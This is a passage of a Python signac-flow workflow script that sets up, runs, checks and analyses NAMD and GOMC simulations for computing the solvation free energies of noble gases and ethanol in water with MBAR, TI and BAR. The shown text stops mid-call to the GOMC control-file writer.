def statepoint_without_replica(job):
    """Return the job statepoint as sorted (key, value) pairs, omitting the replica index."""
    excluded_keys = {"replica_number_int"}
    ordered_keys = sorted(k for k in job.sp.keys() if k not in excluded_keys)
    return [(k, job.sp[k]) for k in ordered_keys]
def statepoint_without_temperature(job):
    """Return the job statepoint as sorted (key, value) pairs, omitting the production temperature."""
    excluded_keys = {"production_temperature_K"}
    ordered_keys = sorted(k for k in job.sp.keys() if k not in excluded_keys)
    return [(k, job.sp[k]) for k in ordered_keys]
# ******************************************************
# ******************************************************
# functions for selecting/grouping/aggregating in different ways (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# functions for free energy calcs MBAR, TI, and BAR for getting delta free energy and delta error (start)
# ******************************************************
# ******************************************************
def get_delta_TI_or_MBAR(TI_or_MBAR_estimate, k_b_T):
    """Return the free energy change and its standard deviation, both scaled by k_b_T,
    from a fitted TI or MBAR estimator (first state -> last state)."""
    free_energy_change = TI_or_MBAR_estimate.delta_f_.iloc[0, -1] * k_b_T
    free_energy_std = TI_or_MBAR_estimate.d_delta_f_.iloc[0, -1] * k_b_T
    return free_energy_change, free_energy_std
def get_delta_BAR(BAR_estimate, k_b_T):
    """Return the free energy change and its standard deviation, both scaled by k_b_T,
    from a fitted BAR estimator.

    BAR reports only adjacent-state errors, so the overall error is the root
    of the summed squared adjacent-state (i, i+1) errors.
    """
    pair_errors = BAR_estimate.d_delta_f_.values
    sum_sq_error = sum(
        pair_errors[state_i][state_i + 1] ** 2
        for state_i in range(len(BAR_estimate.d_delta_f_) - 1)
    )
    free_energy_change = BAR_estimate.delta_f_.iloc[0, -1] * k_b_T
    return free_energy_change, k_b_T * sum_sq_error ** 0.5
# ******************************************************
# ******************************************************
# functions for free energy calcs MBAR, TI, and BAR for getting delta free energy and delta error (end)
# ******************************************************
# ******************************************************
@Project.label
def part_1a_initial_data_input_to_json(job):
    """Check that the initial job data is written to the json files.

    Returns True when the job's signac document file exists.
    """
    # Return the boolean directly; the f-string that wrapped the plain
    # string literal added nothing.
    return job.isfile("signac_job_document.json")
@Project.post(part_1a_initial_data_input_to_json)
@Project.operation.with_directives(
    {
        "np": 1,
        "ngpu": 0,
        "memory": memory_needed,
        "walltime": walltime_mosdef_hr,
    }
)
@flow.with_job
def initial_parameters(job):
    """Set the initial job parameters into the jobs doc json file.

    Stores the lambda schedule for the free energy calculation, the
    production ensemble and state conditions, the replica seed, the solute
    and solvent residue names, and the NAMD/GOMC binary selections in
    job.doc.

    Raises
    ------
    ValueError
        If the lambda schedule endpoints are not 0 and 1, the solvent/solute
        pair is unsupported, the CPU/GPU selection is invalid, or the
        production ensemble is not NPT/NVT.
    """
    # Free energy calcs: build an evenly spaced LambdaVDW schedule from 0 to
    # 1 inclusive, with one InitialState index per lambda point.
    LambdaVDW_list = []
    InitialState_list = []
    for lamda_i in range(0, int(number_of_lambda_spacing_including_zero_int)):
        lambda_space_increments = 1 / int(number_of_lambda_spacing_including_zero_int - 1)
        LambdaVDW_list.append(np.round(lamda_i * lambda_space_increments, decimals=8))
        InitialState_list.append(lamda_i)
    print("*********************")
    print("*********************")
    print("LambdaVDW_list = " + str(LambdaVDW_list))
    print("InitialState_list = " + str(InitialState_list))
    print("*********************")
    print("*********************")
    # BUGFIX: raise if EITHER endpoint is wrong. The original used 'and',
    # which only raised when both endpoints were wrong at the same time.
    if LambdaVDW_list[0] != 0 or LambdaVDW_list[-1] != 1:
        raise ValueError("ERROR: The selected lambda list values do not start with a 0 and end 1.")
    job.doc.LambdaVDW_list = LambdaVDW_list
    job.doc.InitialState_list = InitialState_list
    # set the GOMC production ensemble temp, pressure, molecule, box dimension and residue names
    job.doc.production_ensemble = "NVT"
    job.doc.production_pressure_bar = (1 * u.atm).to('bar')
    job.doc.production_temperature_K = job.sp.production_temperature_K
    job.doc.N_liquid_solvent = 1000
    job.doc.N_liquid_solute = 1
    job.doc.liq_box_lengths_ang = 31.07 * u.angstrom
    job.doc.Rcut_ang = 15 * u.angstrom  # this is the Rcut for GOMC it is the Rswitch for NAMD
    job.doc.Rcut_for_switch_namd_ang = 17 * u.angstrom  # Switch Rcut for NAMD's Switch function
    job.doc.neighbor_list_dist_namd_ang = 22 * u.angstrom  # NAMD's neighbor list
    # Replica seeds: the seed equals the replica index (replicas 0-20); the
    # identity dict preserves the original behavior (None for indices > 20).
    replica_no_to_seed_dict = {i: i for i in range(21)}
    job.doc.replica_number_int = replica_no_to_seed_dict.get(
        int(job.sp.replica_number_int)
    )
    # set solvent and solute in doc
    job.doc.solvent = "TIP4"
    job.doc.solute = job.sp.solute
    # CPU/GPU resources per supported solvent/solute pair
    if job.doc.solvent in ["TIP4", "TIP3"] and job.doc.solute in ["He", "Ne", "Kr", "Ar", "Xe", "Rn", "ETOH"]:
        job.doc.namd_node_ncpu = 1
        job.doc.namd_node_ngpu = 1
        job.doc.gomc_ncpu = 1  # 1 is optimal but I want data quick. run time is set for 1 cpu
        job.doc.gomc_ngpu = 1
    else:
        raise ValueError(
            "ERROR: The solvent and solute are not set up to select the mixing rules or electrostatics "
        )
    # get the namd binary paths
    if job.doc.namd_node_ngpu == 0:
        job.doc.namd_cpu_or_gpu = "CPU"
    elif job.doc.namd_node_ngpu == 1:
        job.doc.namd_cpu_or_gpu = "GPU"
    else:
        raise ValueError(
            "The NAMD CPU and GPU can not be determined as force field (FF) is not available in the selection, "
            "or GPU selection is not 0 or 1."
        )
    # get the gomc binary paths
    if job.doc.gomc_ngpu == 0:
        job.doc.gomc_cpu_or_gpu = "CPU"
    elif job.doc.gomc_ngpu == 1:
        job.doc.gomc_cpu_or_gpu = "GPU"
    else:
        raise ValueError(
            "The GOMC CPU and GPU can not be determined as force field (FF) is not available in the selection, "
            "or GPU selection is not 0 or 1."
        )
    # per-initial-state bookkeeping dicts, filled in as control files are written
    job.doc.gomc_equilb_design_ensemble_dict = {}
    job.doc.gomc_production_run_ensemble_dict = {}
    # select the NAMD/GOMC binary names for the chosen production ensemble
    if job.doc.production_ensemble == "NPT":
        job.doc.namd_equilb_NPT_gomc_binary_file = "namd2"
        job.doc.gomc_equilb_design_ensemble_gomc_binary_file = f"GOMC_{job.doc.gomc_cpu_or_gpu}_NPT"
        job.doc.gomc_production_ensemble_gomc_binary_file = f"GOMC_{job.doc.gomc_cpu_or_gpu}_NPT"
    elif job.doc.production_ensemble == "NVT":
        job.doc.namd_equilb_NPT_gomc_binary_file = "namd2"
        job.doc.gomc_equilb_design_ensemble_gomc_binary_file = f"GOMC_{job.doc.gomc_cpu_or_gpu}_NPT"
        job.doc.gomc_production_ensemble_gomc_binary_file = f"GOMC_{job.doc.gomc_cpu_or_gpu}_NVT"
    else:
        raise ValueError(
            "ERROR: The 'GCMC', 'GEMC_NVT', 'GEMC_NPT' ensembles is not currently available for this project.py "
        )
# ******************************************************
# ******************************************************
# create some initial variable to be store in each jobs
# directory in an additional json file, and test
# to see if they are written (end).
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# check if GOMC psf, pdb, and force field (FF) files were written (start)
# ******************************************************
# ******************************************************
# check if GOMC-MOSDEF wrote the gomc files
# @Project.pre(select_production_ensemble)
@Project.label
@flow.with_job
def mosdef_input_written(job):
    """Check that the mosdef files (psf, pdb, and force field (FF) files) are written."""
    required_files = (
        f"{namd_ff_filename_str}.inp",
        f"{gomc_ff_filename_str}.inp",
        f"{mosdef_structure_box_0_name_str}.psf",
        f"{mosdef_structure_box_0_name_str}.pdb",
    )
    return all(job.isfile(file_name) for file_name in required_files)
# ******************************************************
# ******************************************************
# check if GOMC psf, pdb, and FF files were written (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# check if GOMC control file was written (start)
# ******************************************************
# ******************************************************
# function for checking if the GOMC control file is written
def gomc_control_file_written(job, control_filename_str):
    """General check that the gomc control files are written.

    A line whose first token is "OutputName" marks a fully written file.
    """
    control_file = f"{control_filename_str}.conf"
    if not job.isfile(control_file):
        return False
    with open(job.fn(control_file), "r") as conf_fp:
        conf_lines = conf_fp.readlines()
    return any(
        conf_line.split()[0] == "OutputName"
        for conf_line in conf_lines
        if "OutputName" in conf_line
    )
# function for checking if the NAMD control file is written
def namd_control_file_written(job, control_filename_str):
    """General check that the NAMD control files are written.

    A line whose first token is "cellBasisVector1" marks a fully written file.
    """
    control_file = f"{control_filename_str}.conf"
    if not job.isfile(control_file):
        return False
    with open(job.fn(control_file), "r") as conf_fp:
        conf_lines = conf_fp.readlines()
    return any(
        conf_line.split()[0] == "cellBasisVector1"
        for conf_line in conf_lines
        if "cellBasisVector1" in conf_line
    )
# checking if the NAMD control file is written for the melt equilb NVT run
@Project.label
@flow.with_job
def part_2a_namd_equilb_NPT_control_file_written(job):
    """Check that the namd_equilb_NPT control file (the high-temperature
    ramp-down NAMD control file) has been written."""
    control_is_written = namd_control_file_written(
        job, namd_equilb_NPT_control_file_name_str
    )
    return control_is_written
# checking if the GOMC control file is written for the equilb run with the selected ensemble
@Project.label
@flow.with_job
def part_2b_gomc_equilb_design_ensemble_control_file_written(job):
    """General check that the gomc_equilb_design_ensemble (run temperature) gomc control file is written.

    Returns True only when the control file for EVERY initial (lambda) state
    is written; False when any is missing or the doc entries do not exist yet.
    """
    try:
        for initial_state_i in list(job.doc.InitialState_list):
            try:
                # BUGFIX: the result of this check was previously discarded,
                # so a missing/incomplete control file still reported True.
                if not gomc_control_file_written(
                    job,
                    job.doc.gomc_equilb_design_ensemble_dict[
                        str(initial_state_i)
                    ]["output_name_control_file_name"],
                ):
                    return False
            except:
                # doc entry for this state not created yet
                return False
        return True
    except:
        # job.doc.InitialState_list not created yet
        return False
# checking if the GOMC control file is written for the production run
@Project.label
@flow.with_job
def part_2c_gomc_production_control_file_written(job):
    """General check that the gomc_production_control_file (run temperature) is written.

    Returns True only when the control file for EVERY initial (lambda) state
    is written. BUGFIX: the original returned from inside the loop, so only
    the first state's control file was ever checked.
    """
    try:
        for initial_state_i in list(job.doc.InitialState_list):
            try:
                if not gomc_control_file_written(
                    job,
                    job.doc.gomc_production_run_ensemble_dict[
                        str(initial_state_i)
                    ]["output_name_control_file_name"],
                ):
                    return False
            except:
                # doc entry for this state not created yet
                return False
        return True
    except:
        # job.doc.InitialState_list not created yet
        return False
# ******************************************************
# ******************************************************
# check if GOMC control file was written (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# check if GOMC simulations started (start)
# ******************************************************
# ******************************************************
# function for checking if GOMC simulations are started
def gomc_simulation_started(job, control_filename_str):
    """General check to see if the gomc simulation is started.

    Started means both the console log (out_<name>.dat) and the merged psf
    (<name>_merged.psf) exist in the job workspace.
    """
    console_log = "out_{}.dat".format(control_filename_str)
    merged_psf = "{}_merged.psf".format(control_filename_str)
    return job.isfile(console_log) and job.isfile(merged_psf)
# function for checking if NAMD simulations are started
def namd_simulation_started(job, control_filename_str):
    """General check to see if the namd simulation is started.

    Started means both the console log (out_<name>.dat) and the restart
    extended-system file (<name>.restart.xsc) exist in the job workspace.
    """
    console_log = "out_{}.dat".format(control_filename_str)
    restart_xsc = "{}.restart.xsc".format(control_filename_str)
    return job.isfile(console_log) and job.isfile(restart_xsc)
# check if melt equilb_NVT namd run is started
@Project.label
@flow.with_job
def part_3a_output_namd_equilb_NPT_started(job):
    """Check whether the namd_equilb_NPT run (the high-temperature ramp-down
    NAMD control file) has started."""
    namd_started = namd_simulation_started(
        job, namd_equilb_NPT_control_file_name_str
    )
    return namd_started
# check if equilb_with design ensemble GOMC run is started
@Project.label
@flow.with_job
def part_3b_output_gomc_equilb_design_ensemble_started(job):
    """Check to see if the gomc_equilb_design_ensemble simulation is started (set temperature).

    Returns True only when the console log AND merged psf exist for EVERY
    initial (lambda) state. BUGFIX: the result of gomc_simulation_started was
    previously discarded, so only the console log's existence was actually
    enforced.
    """
    try:
        for initial_state_i in list(job.doc.InitialState_list):
            try:
                if not gomc_simulation_started(
                    job,
                    job.doc.gomc_equilb_design_ensemble_dict[
                        str(initial_state_i)
                    ]["output_name_control_file_name"],
                ):
                    return False
            except:
                # doc entry for this state not created yet
                return False
        return True
    except:
        # job.doc.InitialState_list not created yet
        return False
# check if production GOMC run is started by seeing if the GOMC consol file and the merged psf exist
@Project.label
@flow.with_job
def part_part_3c_output_gomc_production_run_started(job):
    """Check to see if the gomc production run simulation is started (set temperature).

    Returns True only when the console log AND merged psf exist for EVERY
    initial (lambda) state. BUGFIX: the result of gomc_simulation_started was
    previously discarded. NOTE: the doubled "part_part_" in the name is kept
    because it is the registered signac-flow label.
    """
    try:
        for initial_state_i in list(job.doc.InitialState_list):
            try:
                if not gomc_simulation_started(
                    job,
                    job.doc.gomc_production_run_ensemble_dict[
                        str(initial_state_i)
                    ]["output_name_control_file_name"],
                ):
                    return False
            except:
                # doc entry for this state not created yet
                return False
        return True
    except:
        # job.doc.InitialState_list not created yet
        return False
# ******************************************************
# ******************************************************
# check if GOMC simulations started (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# check if GOMC and NAMD simulation are completed properly (start)
# ******************************************************
# ******************************************************
# function for checking if GOMC simulations are completed properly
def gomc_sim_completed_properly(job, control_filename_str):
    """General check to see if the gomc simulation was completed properly.

    Scans the console log for lines containing "Move"; the result follows
    the LAST such line, which must start with the tokens
    "Move Type Mol. Kind" for the run to count as properly finished.
    """
    finished = False
    log_name = "out_{}.dat".format(control_filename_str)
    if job.isfile(log_name):
        with open(job.fn(log_name), "r") as log_fp:
            for log_line in log_fp:
                if "Move" in log_line:
                    tokens = log_line.split()
                    finished = (
                        tokens[0] == "Move"
                        and tokens[1] == "Type"
                        and tokens[2] == "Mol."
                        and tokens[3] == "Kind"
                    )
    return finished
# function for checking if NAMD simulations are completed properly
def namd_sim_completed_properly(job, control_filename_str):
    """General check to see if the namd simulation was completed properly.

    Scans the console log for lines containing "WallClock:"; the result
    follows the LAST such line, which must match NAMD's final
    "WallClock: ... CPUTime: ... Memory: ..." summary line.
    """
    finished = False
    log_name = "out_{}.dat".format(control_filename_str)
    if job.isfile(log_name):
        with open(job.fn(log_name), "r") as log_fp:
            for log_line in log_fp:
                if "WallClock:" in log_line:
                    tokens = log_line.split()
                    finished = (
                        tokens[0] == "WallClock:"
                        and tokens[2] == "CPUTime:"
                        and tokens[4] == "Memory:"
                    )
    return finished
# check if melt equilb NVT GOMC run completed by checking the end of the GOMC consol file
@Project.label
@flow.with_job
def part_4a_job_namd_equilb_NPT_completed_properly(job):
    """Check to see if the namd_equilb_NPT_control_file was completed properly
    (high temperature to set temperature NAMD control file)."""
    # The completion check was previously run twice (once into an unused
    # local for a commented-out debug print); a single call suffices.
    return namd_sim_completed_properly(
        job, namd_equilb_NPT_control_file_name_str
    )
# check if equilb selected ensemble GOMC run completed by checking the end of the GOMC consol file
@Project.label
@flow.with_job
def part_4b_job_gomc_equilb_design_ensemble_completed_properly(job):
    """Check to see if the gomc_equilb_design_ensemble simulation was completed properly (set temperature)."""
    try:
        for state_iter in list(job.doc.InitialState_list):
            try:
                log_basename_iter = job.doc.gomc_equilb_design_ensemble_dict[
                    str(state_iter)
                ]["output_name_control_file_name"]
                completed_iter = gomc_sim_completed_properly(job, log_basename_iter)
                if completed_iter is False:
                    print("gomc_equilb_design_ensemble incomplete state " + str(state_iter))
                    return False
            except:
                return False
        return True
    except:
        return False
# check if production GOMC run completed by checking the end of the GOMC consol file
@Project.label
@flow.with_job
def part_4c_job_production_run_completed_properly(job):
    """Check to see if the gomc production run simulation was completed properly (set temperature)."""
    try:
        for state_iter in list(job.doc.InitialState_list):
            try:
                run_basename_iter = job.doc.gomc_production_run_ensemble_dict[
                    str(state_iter)
                ]["output_name_control_file_name"]
                if gomc_sim_completed_properly(job, run_basename_iter) is False:
                    print("Isn't finished ", run_basename_iter)
                    return False
                # the free energy output file must also exist for this state
                free_energy_file_iter = f'Free_Energy_BOX_0_{run_basename_iter}.dat'
                if job.isfile(free_energy_file_iter) is False:
                    print("Isn't finished ", free_energy_file_iter)
                    return False
            except:
                return False
        return True
    except:
        return False
# ******************************************************
# ******************************************************
# check if GOMC and NAMD simulation are completed properly (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# check if GOMC anaylsis is completed properly (start)
# ******************************************************
# ******************************************************
# check if analysis is done for the individual replicates wrote the gomc files
@Project.pre(part_4c_job_production_run_completed_properly)
@Project.label
@flow.with_job
def part_5a_analysis_individual_simulation_averages_completed(job):
    """Check that the individual simulation averages files are written.

    Returns True when the per-replicate averages text file exists.
    """
    # Return the boolean directly; the f-string that wrapped the plain
    # variable added nothing.
    return job.isfile(output_replicate_txt_file_name_box_0)
# check if analysis for averages of all the replicates is completed
@Project.pre(part_5a_analysis_individual_simulation_averages_completed)
@Project.label
def part_5b_analysis_replica_averages_completed(*jobs):
    """Check that the simulation replicate average and std. dev. files are written.

    Passes only when the cross-replicate averages file is visible from every
    aggregated job's workspace.
    """
    replicate_avg_path = (
        f"../../analysis/{output_avg_std_of_replicates_txt_file_name_box_0}"
    )
    return all(job.isfile(replicate_avg_path) for job in jobs)
# ******************************************************
# ******************************************************
# check if GOMC anaylsis is completed properly (end)
# ******************************************************
# ******************************************************
# ******************************************************
# ******************************************************
# build system, with option to write the force field (force field (FF)), pdb, psf files.
# Note: this is needed to write GOMC control file, even if a restart (start)
# ******************************************************
# build system
def build_charmm(job, write_files=True):
    """Build the Charmm object and potentially write the pdb, psd, and force field (FF) files.

    Parameters
    ----------
    job : signac job
        Job whose doc/statepoint supply the solute, solvent, molecule counts,
        box length, production ensemble, and replica seed.
    write_files : bool, default True
        When True, write the GOMC/NAMD FF (.inp), .psf, and .pdb files into
        the job workspace.

    Returns
    -------
    list
        [namd_charmm, gomc_charmm] mf_charmm.Charmm objects.
    """
    print("#**********************")
    print("Started: GOMC Charmm Object")
    print("#**********************")
    # seed the box packing with the replica number so each replica differs
    mbuild_box_seed_no = job.doc.replica_number_int
    solvent = mb.load(smiles_or_mol2[job.doc.solvent]['smiles_or_mol2'],
                      smiles=smiles_or_mol2[job.doc.solvent]['use_smiles']
                      )
    solvent.name = job.doc.solvent
    # the TIP4 solvent is not energy minimized here
    if job.doc.solvent not in ["TIP4"]:
        solvent.energy_minimize(forcefield=forcefield_dict[job.doc.solvent], steps=10 ** 5)
    # single-atom noble gases are built directly as a named compound
    if job.sp.solute in ["He", "Ne", "Kr", "Ar", "Xe", "Rn"]:
        solute = mb.Compound(name=job.doc.solute)
    else:
        solute = mb.load(smiles_or_mol2[job.sp.solute]['smiles_or_mol2'],
                         smiles=smiles_or_mol2[job.sp.solute]['use_smiles']
                         )
    solute.name = job.sp.solute
    # only put the FF molecules in the simulation in the dictionary input into the Charmm object.
    minimal_forcefield_dict = {solute.name: forcefield_dict[solute.name],
                               solvent.name: forcefield_dict[solvent.name]
                               }
    solute.energy_minimize(forcefield=forcefield_dict[job.sp.solute], steps=10 ** 5)
    # map mbuild bead names to output atom names
    bead_to_atom_name_dict = {
        "_LP": "LP",
    }
    residues_list = [solute.name, solvent.name]
    print("residues_list = " +str(residues_list ))
    # water solvents get fixed bonds/angles in the GOMC files only
    if job.doc.solvent in ["TIP4", "TIP3"]:
        gomc_fix_bonds_angles_residues_list = [solvent.name]
    else:
        gomc_fix_bonds_angles_residues_list = None
    print('Running: filling liquid box')
    box_0 = mb.fill_box(compound=[solute, solvent],
                        n_compounds=[job.doc.N_liquid_solute, job.doc.N_liquid_solvent],
                        box=[u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("nm"),
                             u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("nm"),
                             u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("nm"),
                             ],
                        seed=mbuild_box_seed_no
                        )
    print('Completed: filling liquid box')
    print('Running: GOMC FF file, and the psf and pdb files')
    if job.doc.production_ensemble in ["NVT", "NPT"]:
        print('Running: namd_charmm')
        # NAMD Charmm object: gomc_fix_bonds_angles=None for the NAMD files
        namd_charmm = mf_charmm.Charmm(
            box_0,
            mosdef_structure_box_0_name_str,
            structure_box_1=None,
            filename_box_1=None,
            ff_filename= namd_ff_filename_str,
            forcefield_selection=minimal_forcefield_dict,
            residues=residues_list,
            bead_to_atom_name_dict=bead_to_atom_name_dict,
            gomc_fix_bonds_angles=None,
        )
        print('Running: gomc_charmm')
        # GOMC Charmm object: fixed bonds/angles applied to the water residue
        gomc_charmm = mf_charmm.Charmm(
            box_0,
            mosdef_structure_box_0_name_str,
            structure_box_1=None,
            filename_box_1=None,
            ff_filename= gomc_ff_filename_str,
            forcefield_selection=minimal_forcefield_dict,
            residues=residues_list,
            bead_to_atom_name_dict=bead_to_atom_name_dict,
            gomc_fix_bonds_angles=gomc_fix_bonds_angles_residues_list,
        )
    else:
        raise ValueError("ERROR: The GCMC and GEMC ensembles are not supported in this script.")
    # note: the psf/pdb are written once from the NAMD object and shared
    if write_files == True:
        gomc_charmm.write_inp()
        namd_charmm.write_inp()
        namd_charmm.write_psf()
        namd_charmm.write_pdb()
    print("#**********************")
    print("Completed: GOMC Charmm Object")
    print("#**********************")
    return [namd_charmm, gomc_charmm]
# ******************************************************
# ******************************************************
# build system, with option to write the force field (FF), pdb, psf files.
# Note: this is needed to write GOMC control file, even if a restart (end)
# ******************************************************
# ******************************************************
# ******************************************************
# Creating GOMC files (pdb, psf, force field (FF), and gomc control files (start)
# ******************************************************
# ******************************************************
@Project.pre(part_1a_initial_data_input_to_json)
@Project.post(part_2a_namd_equilb_NPT_control_file_written)
@Project.post(part_2b_gomc_equilb_design_ensemble_control_file_written)
@Project.post(part_2c_gomc_production_control_file_written)
@Project.post(mosdef_input_written)
@Project.operation.with_directives(
    {
        "np": 1,
        "ngpu": 0,
        "memory": memory_needed,
        "walltime": walltime_mosdef_hr,
    }
)
@flow.with_job
def build_psf_pdb_ff_gomc_conf(job):
    """Build the Charmm object and write the pdb, psd, and force field (FF)
    files for all the simulations in the workspace.

    Writes the NAMD NPT equilibration control file, then one GOMC
    equilibration control file and one GOMC production control file per
    lambda initial state in ``job.doc.InitialState_list``.
    """
    # Build both Charmm objects (NAMD and GOMC) and write their pdb/psf/FF files.
    [namd_charmm_object_with_files, gomc_charmm_object_with_files] = build_charmm(job, write_files=True)
    # [run free-energy calc?, output frequency in MC steps]
    FreeEnergyCalc = [True, int(gomc_free_energy_output_data_every_X_steps)]
    # [residue name of the solute, number of solute molecules]
    MoleculeType = [job.sp.solute, 1]
    use_ElectroStatics = True
    VDWGeometricSigma = False
    Exclude = "1-4"
    # common variables
    cutoff_style = "VDW"
    # Guard: this workflow only supports the VDW cutoff style (see message).
    if cutoff_style != "VDW":
        raise ValueError("ERROR: this project is only set up for the SWITCH cutoff style for NAMD"
                         "and VDW for GOMC. Therefore, the cutoff style selected must be VDW. "
                         "Rswitch for namd only so the r_switch_dist_start and "
                         "r_switch_dist_end must be supplied for NAMD. GOMC will then move to VDW "
                         "with the switch dist (r_switch_dist_start) as the cutoff with LRC.")
    production_temperature_K = (job.sp.production_temperature_K * u.K).to_value("K")
    production_pressure_bar = (job.doc.production_pressure_bar * u.bar).to_value("bar")
    # cubic liquid box: the same edge length (Angstrom) on all three axes
    box_lengths_ang = [u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("angstrom"),
                       u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("angstrom"),
                       u.unyt_quantity(job.doc.liq_box_lengths_ang, 'angstrom').to_value("angstrom"),
                       ]
    seed_no = job.doc.replica_number_int
    namd_template_path_str = os.path.join(project_directory_path, "templates/NAMD_conf_template.conf")
    # Select the NAMD water model when either the solvent or the solute is water.
    if job.doc.solvent in ["TIP3"] or job.sp.solute in ["TIP3"]:
        namd_uses_water = True
        namd_water_model = 'tip3'
    elif job.doc.solvent in ["TIP4"] or job.sp.solute in ["TIP4"]:
        namd_uses_water = True
        namd_water_model = 'tip4'
    else:
        namd_uses_water = False
        namd_water_model = None
    # generate the namd file
    # NOTE: the production and melt temps are converted to integers so they can be ramped down
    # from hot to cool to equilibrate the system.
    generate_namd_equilb_control_file(template_path_filename=namd_template_path_str,
                                      namd_path_conf_filename=namd_equilb_NPT_control_file_name_str,
                                      namd_path_file_output_names=namd_equilb_NPT_control_file_name_str,
                                      namd_uses_water=namd_uses_water,
                                      namd_water_model=namd_water_model,
                                      namd_electrostatics_bool=use_ElectroStatics,
                                      namd_vdw_geometric_sigma_bool=VDWGeometricSigma,
                                      namd_psf_path_filename=f"{mosdef_structure_box_0_name_str}.psf",
                                      namd_pdb_path_filename=f"{mosdef_structure_box_0_name_str}.pdb",
                                      namd_ff_path_filename=f"{namd_ff_filename_str}.inp",
                                      namd_production_temp_K=int(production_temperature_K),
                                      namd_production_pressure_bar=production_pressure_bar,
                                      electrostatic_1_4=namd_charmm_object_with_files.coul_1_4,
                                      non_bonded_cutoff=job.doc.Rcut_for_switch_namd_ang,
                                      non_bonded_switch_distance=job.doc.Rcut_ang,
                                      pairlist_distance=job.doc.neighbor_list_dist_namd_ang,
                                      box_lengths=box_lengths_ang,
                                      )
    print("#**********************")
    print("Completed: namd_equilb_NPT GOMC control file writing")
    print("#**********************")
    # ******************************************************
    # namd_equilb_NPT - psf, pdb, force field (FF) file writing and GOMC control file writing (end)
    # ******************************************************
    # ******************************************************
    # equilb selected_ensemble, if NVT -> NPT - GOMC control file writing (start)
    # Note: the control files are written for the max number of gomc_equilb_design_ensemble runs
    # so the Charmm object only needs created 1 time.
    # ******************************************************
    print("#**********************")
    print("Started: equilb NPT or GEMC-NVT GOMC control file writing")
    print("#**********************")
    # One GOMC equilibration and one production control file per lambda initial state.
    for initial_state_sims_i in list(job.doc.InitialState_list):
        # The equilibration run restarts from the NAMD equilibration outputs.
        namd_restart_pdb_psf_file_name_str = mosdef_structure_box_0_name_str
        restart_control_file_name_str = namd_equilb_NPT_control_file_name_str
        output_name_control_file_name = "{}_initial_state_{}".format(
            gomc_equilb_design_ensemble_control_file_name_str, initial_state_sims_i
        )
        # Record the restart/output file names so the run operations can find them.
        job.doc.gomc_equilb_design_ensemble_dict.update(
            {
                initial_state_sims_i: {
                    "restart_control_file_name": restart_control_file_name_str,
                    "output_name_control_file_name": output_name_control_file_name,
                }
            }
        )
        # calc MC steps
        MC_steps = int(gomc_steps_equilb_design_ensemble)
        EqSteps = 1000
        # output all data and calc frequency
        output_true_list_input = [
            True,
            int(gomc_output_data_every_X_steps),
        ]
        output_false_list_input = [
            False,
            int(gomc_output_data_every_X_steps),
        ]
        # MC move ratios for the supported solvent/solute combinations.
        # NOTE(review): there is no else on this solvent/solute guard, so an
        # unsupported combination would leave the move-frequency variables
        # undefined below — presumably validated upstream; TODO confirm.
        if job.doc.solvent in ["TIP4", "TIP3"] \
                and job.doc.solute in ["He", "Ne", "Kr", "Ar", "Xe", "Rn", "ETOH"]:
            used_ensemble = "NPT"
            if job.doc.production_ensemble in ["NVT", "NPT"]:
                VolFreq = (0.01,)
                MultiParticleFreq = (None,)
                IntraSwapFreq = (0.0,)
                CrankShaftFreq = (None,)
                SwapFreq = (None,)
                DisFreq = (0.39,)
                RotFreq = (0.3,)
                RegrowthFreq = (0.3,)
            else:
                raise ValueError(
                    "Moleules MC move ratios not listed for this solvent and solute or ensemble "
                    "in the GOMC control file writer."
                )
        # Starting configuration: NAMD pdb/psf plus its binary restart files.
        Coordinates_box_0 = "{}.pdb".format(
            namd_restart_pdb_psf_file_name_str
        )
        Structure_box_0 = "{}.psf".format(
            namd_restart_pdb_psf_file_name_str
        )
        binCoordinates_box_0 = "{}.restart.coor".format(
            restart_control_file_name_str
        )
        extendedSystem_box_0 = "{}.restart.xsc".format(
            restart_control_file_name_str
        )
        gomc_control.write_gomc_control_file(
            gomc_charmm_object_with_files,
            output_name_control_file_name,
            used_ensemble,
            MC_steps,
            production_temperature_K,
            ff_psf_pdb_file_directory=None,
            check_input_files_exist=False,
            Parameters="{}.inp".format(gomc_ff_filename_str),
            Restart=True,
            RestartCheckpoint=True,
            ExpertMode=False,
            Coordinates_box_0=Coordinates_box_0,
            Structure_box_0=Structure_box_0,
            binCoordinates_box_0=binCoordinates_box_0,
            extendedSystem_box_0=extendedSystem_box_0,
            binVelocities_box_0=None,
            Coordinates_box_1=None,
            Structure_box_1=None,
            binCoordinates_box_1=None,
            extendedSystem_box_1=None,
            binVelocities_box_1=None,
            input_variables_dict={
                "PRNG": seed_no,
                "Pressure": production_pressure_bar,
                "Ewald": use_ElectroStatics,
                "ElectroStatic": use_ElectroStatics,
                "VDWGeometricSigma": VDWGeometricSigma,
                "Rcut": job.doc.Rcut_ang,
                "Exclude": Exclude,
                "VolFreq": VolFreq[-1],
                "MultiParticleFreq": MultiParticleFreq[-1],
                "IntraSwapFreq": IntraSwapFreq[-1],
                "CrankShaftFreq": CrankShaftFreq[-1],
                "SwapFreq": SwapFreq[-1],
                "DisFreq": DisFreq[-1],
                "RotFreq": RotFreq[-1],
                "RegrowthFreq": RegrowthFreq[-1],
                "OutputName": output_name_control_file_name,
                "EqSteps": EqSteps,
                "PressureCalc": output_false_list_input,
                "RestartFreq": output_true_list_input,
                "CheckpointFreq": output_true_list_input,
                "ConsoleFreq": output_true_list_input,
                "BlockAverageFreq": output_true_list_input,
                "HistogramFreq": output_false_list_input,
                "CoordinatesFreq": output_false_list_input,
                "DCDFreq": output_true_list_input,
                "Potential": cutoff_style,
                "LRC": True,
                "RcutLow": 0,
                "CBMC_First": 12,
                "CBMC_Nth": 10,
                "CBMC_Ang": 50,
                "CBMC_Dih": 50,
                "FreeEnergyCalc": FreeEnergyCalc,
                "MoleculeType": MoleculeType,
                "InitialState": initial_state_sims_i,
